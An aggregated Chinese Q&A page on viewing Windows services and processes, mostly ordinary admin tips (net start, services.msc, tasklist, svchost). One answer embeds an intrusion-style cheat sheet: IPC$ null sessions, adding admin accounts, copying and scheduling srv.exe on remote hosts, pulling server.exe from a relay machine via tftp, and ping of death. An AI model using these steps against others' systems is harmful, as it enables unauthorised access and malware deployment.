windows命令檢查後台服務狀態

① 如何查自己電腦運行了什麼後台程序，並且關閉什麼不必要後台程序啊，求高手

ntsd--windows進程的終結者 ntsd.exe是win2k里的自帶的進程調試工具，在system32目錄下。
我們會發現在任務管理器里有一些莫名其妙的進程無法終止，因而不能卸載一些我們不需要的程序；一些病毒進程終止不掉，病毒就永遠無法殺干凈。而ntsd可以幫助我們終止絕大多數頑固進程，當然像System、SMSS.EXE和CSRSS.EXE不能殺。前兩個是純內核態的，最後那個是Win32子系統，ntsd本身需要它。lsass.exe也不要殺掉，它是負責本地賬戶安全的。我們可以在CMD窗口下執行如下命令：
ntsd -c q -p
其中 「-c q」表示命令隨被殺進程的退出而退出；「-p 」指被殺進程ID，PID在任務管理器中可以查到。
ntsd的使用方法，可以直接運行這個文件（不帶參數），得到幫助，只不過全是英文的。

把最後那個PID，改成你要終止的進程的ID。
如果你不知道進程的ID，任務管理器－》進程選項卡－》查看－》選擇列－》
勾上"PID（進程標識符）"，然後就能看見了

xp下還有兩個好東東tasklist和tskill。tasklist能列出所有的進程，和相應的信息。tskill能查殺進程，語法很簡單：tskill程序名

很詳細了,希望能夠你用的

② 如何查看windows運行狀態

查看溫度適用型狀態，這個要看你查詢的具體的內容，比如說查看服務可以去服務 要看你具體的查看內容。微軟一般設定了相關的管理程序，用戶可以通過管理程序來查看系統中運行的進程，內存等等。

③ 在命令提示符下，怎麼查看windows開啟了哪些服務

net start 就是了～～
這個送你～～

net use \\ip\ipc$ " " /user:" " 建立IPC空鏈接
net use \\ip\ipc$ "密碼" /user:"用戶名" 建立IPC非空鏈接
net use h: \\ip\c$ "密碼" /user:"用戶名" 直接登陸後映射對方C：到本地為H:
net use h: \\ip\c$ 登陸後映射對方C：到本地為H:
net use \\ip\ipc$ /del 刪除IPC鏈接
net use h: /del 刪除映射對方到本地的為H:的映射
net user 用戶名 密碼 /add 建立用戶
net user guest /active:yes 激活guest用戶
net user 查看有哪些用戶
net user 帳戶名 查看帳戶的屬性
net localgroup administrators 用戶名 /add 把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator後加s用復數
net start 查看開啟了哪些服務
net start 服務名 開啟服務；(如:net start telnet， net start schele)
net stop 服務名 停止某服務
net time \\目標ip 查看對方時間
net time \\目標ip /set 設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view 查看本地區域網內開啟了哪些共享
net view \\ip 查看對方區域網內開啟了哪些共享
net config 顯示系統網路設置
net logoff 斷開連接的共享
net pause 服務名 暫停某服務
net send ip "文本信息" 向對方發信息
net ver 區域網內正在使用的網路連接類型和信息
net share 查看本地開啟的共享
net share ipc$ 開啟ipc$共享
net share ipc$ /del 刪除ipc$共享
net share c$ /del 刪除C：共享
net user guest 12345 用guest用戶登陸後用將密碼改為12345
net password 密碼 更改系統登陸密碼
netstat -a 查看開啟了哪些埠,常用netstat -an
netstat -n 查看埠的網路連接情況，常用netstat -an
netstat -v 查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip 查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s 查看正在使用的所有協議使用情況
nbtstat -A ip 對方136到139其中一個埠開了的話，就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名) 跟蹤路由（數據包），參數：「-w數字」用於設置超時間隔。
ping ip(或域名) 向對方主機發送默認大小為32位元組的數據，參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping。
ping -t -l 65550 ip 死亡之ping(發送大於64K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg) 用於windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用參數「/all」顯示全部配置信息
tlist -t 以樹行列表顯示進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
kill -F 進程名 加-F參數後強制結束某進程(為系統的附加工具，默認是沒有安裝的，在安裝目錄的Support/tools文件夾內)
del -F 文件名 加-F參數後就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件，/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件。例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件，「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件

#2 二：

del /S /Q 目錄 或用：rmdir /s /Q 目錄 /S刪除目錄及目錄下的所有子目錄和文件。同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除。（二個命令作用相同）
move 盤符\路徑\要移動的文件名 存放移動文件的路徑\移動後文件名 移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt 對比二個文件並把不同之處輸出到3st.txt文件中，"> "和"> >" 是重定向命令
at id號 開啟已注冊的某個計劃任務
at /delete 停止所有計劃任務，用參數/yes則不需要確認就直接停止
at id號 /delete 停止某個已注冊的計劃任務
at 查看所有的計劃任務
at \\ip time 程序名(或一個命令) /r 在某時間運行對方某程序並重新啟動計算機
finger username @host 查看最近有哪些用戶登陸
telnet ip 埠 遠和登陸伺服器,默認埠為23
open ip 連接到IP（屬telnet登陸後的命令）
telnet 在本機上直接鍵入telnet 將進入本機的telnet
路徑\文件名1 路徑\文件名2 /y 復制文件1到指定的目錄為文件2，用參數/y就同時取消確認你要改寫一份現存目錄文件
c:\srv.exe \\ip\admin$ 復制本地c:\srv.exe到對方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件，註：2st.txt文件頭要空三排，參數：/b指二進制文件，/a指ASCLL格式文件
\\ip\admin$\svv.exe c:\ 或:\\ip\admin$\*.* 復制對方admini$共享下的srv.exe文件（所有文件）至本地C：
x 要復制的文件或目錄樹 目標地址\目錄名 復制文件和目錄樹，用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:\server.exe 登陸後，將「IP」的server.exe下載到目標主機c:\server.exe 參數：-i指以二進制模式傳送，如傳送exe文件時用，如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP put c:\server.exe 登陸後，上傳本地c:\server.exe至主機
ftp ip 埠 用於上傳文件至伺服器或進行文件操作，默認埠為21。bin指用二進制方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print 顯示出IP路由，將主要顯示網路地址Network addres，子網掩碼Netmask，網關地址Gateway addres，介面地址Interface
arp 查看和處理ARP緩存，ARP是名字解析的意思，負責把一個IP解析成一個物理性的MAC地址。arp -a將顯示出全部信息
start 程序名或命令 /max 或/min 新開一個新窗口並最大化（最小化）運行某程序或命令
mem 查看cpu使用情況
attrib 文件名(目錄名) 查看某文件（目錄）的屬性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存檔，只讀，系統，隱藏 屬性；用＋則是添加為某屬性
dir 查看文件，參數：/Q顯示文件及目錄屬系統哪個用戶，/T:C顯示文件創建時間，/T:A顯示文件上次被訪問時間，/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間，而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元 設置環境變數
set 顯示當前所有的環境變數
set p(或其它字元) 顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause 暫停批處理程序，並顯示出：請按任意鍵繼續....
if 在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標簽 將cmd.exe導向到批處理程序中帶標簽的行（標簽必須單獨一行，且以冒號打頭，例如：「：start」標簽）
call 路徑\批處理文件名 從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for 對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off 打開或關閉echo，僅用echo不加參數則顯示當前echo設置
echo 信息 在屏幕上顯示出信息
echo 信息 >> pass.txt 將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中尋找字元串hello
find 文件名 查找某文件
title 標題名字 更改CMD窗口標題名字
color 顏色值 設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱 更改cmd.exe的顯示的命令提示符(把C:\、D:\統一改為：EntSky\ )

#3 三：

ver 在DOS窗口下顯示版本信息
winver 彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）
format 盤符 /FS:類型 格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md 目錄名 創建目錄
replace 源文件 要替換文件的目錄 替換文件
ren 原文件名 新文件名 重命名文件名
tree 以樹形結構顯示出目錄，用參數-f 將列出第個文件夾中文件名稱
type 文件名 顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行，重新調用win2k命令，並創建宏)。如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3，再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit 退出cmd.exe程序或目前，用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑\可執行文件的文件名 為可執行文件設置一個路徑。
cmd 啟動一個win2K命令解釋窗口。參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 注冊表文件名 導入注冊表；參數/S指安靜模式導入，無任何提示；
regedit /e 注冊表文件名 導出注冊表
cacls 文件名 參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時。參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無，R 讀取， W 寫入， C 更改(寫入)，F 完全控制；例：cacls D:\test.txt /D pub 設定d:\test.txt拒絕pub用戶訪問。
cacls 文件名 查看文件的訪問用戶許可權列表
REM 文本內容 在批處理文件中添加註解
netsh 查看或更改本地網路配置情況

④ windows server 2012怎麼查看服務

Windows鍵+R鍵一起按，彈出運行窗口。
輸入命令services.msc後回車即可彈出服務窗口。

⑤ 如何查看Windows系統中服務的狀態

打開windows系統的系統服務，有以下幾種方式：
1、右擊我的電腦/計算機，點擊管理，打開計算機管理。

依次選擇服務和應用程序——服務。

2、使用快捷鍵和命令：
同時按下win+r鍵，在運行窗口中輸入services.msc，即可打開服務。

用以上兩種方法打開服務後，雙擊想要打開的的服務，選擇啟動。
以windows updata為例：

在服務狀態選擇「啟動」，就可以打開服務，根據是否需要開機啟動，啟動類型可以選擇自動或者手動，自動為開機自啟。

⑥ 如何利用命令行進行windows故障排查

在windows操作系統下，可以用「ping」命令來檢查線路的連通情況。「ping」命令的用法及參數如下：

具體使用方法：

1、單擊屏幕左下角的「開始」，點擊「運行」，也可以按下鍵盤上的WIN+R組合鍵，快速調出「運行」欄

2、在「運行」欄輸入「cmd」，單擊「確定」

3、輸入「ping 202.108.33.32」,然後敲擊回車。"ping"為命令，「202.108.33.32」為需要檢測通斷的線路的IP地址

4、出現如下畫面，表明線路通暢

⑦ 請檢查windows服務是否已經啟動

①開始→運行中輸入：msconfig →確定（或者按回車鍵）打開系統配置。
②服務→凡是已經開啟的Windows服務，都會在此顯示。
③在命令提示符中輸入：net start→（按回車鍵執行）也能查看。

⑧ 如何查看Windows系統中運行的服務

svchost.exe是nt核心系統的非常重要的進程，對於2000、xp來說，不可或缺。很多病毒、木馬也會調用它。所以，深入了解這個程序，是玩電腦的必修課之一。大家對windows操作系統一定不陌生，但你是否注意到系統中「svchost.exe」這個文件呢？細心的朋友會發現windows中存在多個 「svchost」進程（通過「ctrl+alt+del」鍵打開任務管理器，這里的「進程」標簽中就可看到了），為什麼會這樣呢？下面就來揭開它神秘的面紗。發現在基於nt內核的windows操作系統家族中，不同版本的windows系統，存在不同數量的「svchost」進程，用戶使用「任務管理器」可查看其進程數目。一般來說，win2000有兩個svchost進程，winxp中則有四個或四個以上的svchost進程（以後看到系統中有多個這種進程，千萬別立即判定系統有病毒了喲），而win2003 server中則更多。這些svchost進程提供很多系統服務，如：rpcss服務（remote procere call）、dmserver服務（logical disk manager）、dhcp服務（dhcp client）等。如果要了解每個svchost進程到底提供了多少系統服務，可以在win2000的命令提示符窗口中輸入「tlist -s」命令來查看，該命令是win2000 support tools提供的。在winxp則使用「tasklist /svc」命令。svchost中可以包含多個服務深入windows系統進程分為獨立進程和共享進程兩種，「svchost.exe」文件存在於「%systemroot% system32」目錄下，它屬於共享進程。隨著windows系統服務不斷增多，為了節省系統資源，微軟把很多服務做成共享方式，交由 svchost.exe進程來啟動。但svchost進程只作為服務宿主，並不能實現任何服務功能，即它只能提供條件讓其他服務在這里被啟動，而它自己卻不能給用戶提供任何服務。那這些服務是如何實現的呢？原來這些系統服務是以動態鏈接庫（dll）形式實現的，它們把可執行程序指向 svchost，由svchost調用相應服務的動態鏈接庫來啟動服務。那svchost又怎麼知道某個系統服務該調用哪個動態鏈接庫呢？這是通過系統服務在注冊表中設置的參數來實現。下面就以rpcss（remote procere call）服務為例，進行講解。從啟動參數中可見服務是靠svchost來啟動的。實例以windows xp為例，點擊「開始」/「運行」，輸入「services.msc」命令，彈出服務對話框，然後打開「remote procere call」屬性對話框，可以看到rpcss服務的可執行文件的路徑為「c:\windows\system32\svchost -k rpcss」，這說明rpcss服務是依靠svchost調用「rpcss」參數來實現的，而參數的內容則是存放在系統注冊表中的。在運行對話框中輸入「regedit.exe」後回車，打開注冊表編輯器，找到[hkey_local_machine ]項，找到類型為「reg_expand_sz」的鍵「magepath」，其鍵值為「%systemroot%system32svchost -k rpcss」（這就是在服務窗口中看到的服務啟動命令），另外在「parameters」子項中有個名為「servicedll」的鍵，其值為「% systemroot%system32rpcss.dll」，其中「rpcss.dll」就是rpcss服務要使用的動態鏈接庫文件。這樣 svchost進程通過讀取「rpcss」服務注冊表信息，就能啟動該服務了。解惑因為svchost進程啟動各種服務，所以病毒、木馬也想盡辦法來利用它，企圖利用它的特性來迷惑用戶，達到感染、入侵、破壞的目的（如沖擊波變種病毒「w32.welchia.worm」）。但windows系統存在多個svchost進程是很正常的，在受感染的機器中到底哪個是病毒進程呢？這里僅舉一例來說明。假設windows xp系統被「w32.welchia.worm」感染了。正常的svchost文件存在於「c:\windows\system32」目錄下，如果發現該文件出現在其他目錄下就要小心了。「w32.welchia.worm」病毒存在於「c:\windows\system32wins」目錄中，因此使用進程管理器查看svchost進程的執行文件路徑就很容易發現系統是否感染了病毒。windows系統自帶的任務管理器不能夠查看進程的路徑，可以使用第三方進程管理軟體，如「windows優化大師」進程管理器，通過這些工具就可很容易地查看到所有的svchost進程的執行文件路徑，一旦發現其執行路徑為不平常的位置就應該馬上進行檢測和處理。由於篇幅的關系，不能對svchost全部功能進行詳細介紹，這是一個windows中的一個特殊進程，有興趣的可參考有關技術資料進一步去了解它。

⑨ 在Windows的常用命令有哪些怎麼用查看網路狀態，ip，dns什麼的

1. explorer-------打開資源管理器 2. sndrec32-------錄音機 3. Nslookup-------IP地址偵測器 4. explorer-------打開資源管理器 5.logoff.exe注銷（慎用，立即注銷） 6. tsshutdn-------60秒倒計時關機命令 7. lusrmgr.msc----本機用戶和組 8. services.msc---本地服務設置 9. oobe/msoobe /a----檢查XP是否激活 10. notepad--------打開記事本 11. cleanmgr-------垃圾整理 12. net start messenger----開始信使服務 13. compmgmt.msc---計算機管理 14. net stop messenger-----停止信使服務 15. conf-----------啟動netmeeting 16. dvdplay--------DVD播放器 17. charmap--------啟動字元映射表 18. diskmgmt.msc---磁碟管理實用程序 19. calc-----------啟動計算器 20. dfrg.msc-------磁碟碎片整理程序 21. chkdsk.exe-----Chkdsk磁碟檢查 22. devmgmt.msc--- 設備管理器 23. regsvr32 /u *.dll----停止dll文件運行 24. drwtsn32------ 系統醫生 25. rononce -p ----15秒關機 26. dxdiag---------檢查DirectX信息 27. regedt32-------注冊表編輯器 28. Msconfig.exe---系統配置實用程序 29. rsop.msc-------組策略結果集 30. mem.exe--------顯示內存使用情況 31. utilman--------輔助工具管理器 32. winchat--------XP自帶區域網聊天 33. progman--------程序管理器 34. winmsd---------系統信息 35. utilman--------輔助工具管理器 36. winver---------檢查Windows版本 37. sfc /scannow-----掃描錯誤並復原 38. taskmgr-----任務管理器（2000/xp/2003 /win7 39. winver---------檢查Windows版本 40. Nslookup-------IP地址偵測器 41. wupdmgr--------windows更新程序 42. wscript--------windows腳本宿主設置 43. write----------寫字板 44. winmsd---------系統信息 45. wiaacmgr-------掃描儀和照相機向導 46. winchat--------XP自帶區域網聊天 47. mem.exe--------顯示內存使用情況 48. Msconfig.exe---系統配置實用程序 49. mplayer2-------簡易widnows media player 50. mspaint--------畫圖板 51. mstsc----------遠程桌面連接 52. mplayer2-------媒體播放機 53. magnify--------放大鏡實用程序 54. mmc------------打開控制台 55. mobsync--------同步命令 56. dxdiag---------檢查DirectX信息 57. drwtsn32------ 系統醫生 58. odbcad32-------ODBC數據源管理器 59. oobe/msoobe /a----檢查XP是否激活 60. iexpress-------木馬捆綁工具，系統自帶 61. dcomcnfg-------打開系統組件服務 62. ddeshare-------打開DDE共享設置 63. dvdplay--------DVD播放器 64. net stop messenger-----停止信使服務 65. net start messenger----開始信使服務 66. notepad--------打開記事本 67. nslookup-------網路管理的工具向導 68. ntbackup-------系統備份和還原 69. narrator-------屏幕「講述人」 70. cleanmgr-------垃圾整理 71. osk------------打開屏幕鍵盤 72. netstat -an----(TC)命令檢查介面 73. syncapp--------創建一個公文包 74. sysedit--------系統配置編輯器 75. sigverif-------文件簽名驗證程序 76. sndrec32-------錄音機 77. shrpubw--------創建共享文件夾 78. conf-----------啟動netmeeting 79. syskey---------系統加密，一旦加密就不能解開，保護windows xp系統的雙重密碼 80. Clipbrd--------剪貼板查看器 81. Sndvol32-------音量控製程序 82. sfc.exe--------系統文件檢查器 83. sfc /scannow---windows文件保護 84. cliconfg-------SQL SERVER 客戶端網路實用程序 85. tourstart------xp簡介（安裝完成後出現的漫遊xp程序） 86. taskmgr--------任務管理器 87. eventvwr-------事件查看器 88. eudcedit-------造字程序 89. explorer-------打開資源管理器 90. packager-------對象包裝程序 91. charmap--------啟動字元映射表 92. progman--------程序管理器 93. regedit. regedt32-------注冊表編輯器 94. regsvr32 /u *.dll----停止dll文件運行 95. regsvr32 /u zipfldr.dll------取消ZIP支持 96. cmd.exe--------CMD命令提示符 97. chkdsk.exe-----Chkdsk磁碟檢查 98. calc-----------啟動計算器 99.shutdown at am/pm ##:##:##-----在##時刻自動關機 100.shutdown -a----取消自動關機

⑩ 如何檢查WINDOWS服務是否啟動

①開始→運行中輸入：msconfig→確定（或者按回車鍵）打開系統配置。

②服務→凡是已經開啟的Windows服務，都會在此顯示。

③在命令提示符中輸入：net start→（按回車鍵執行）也能查看。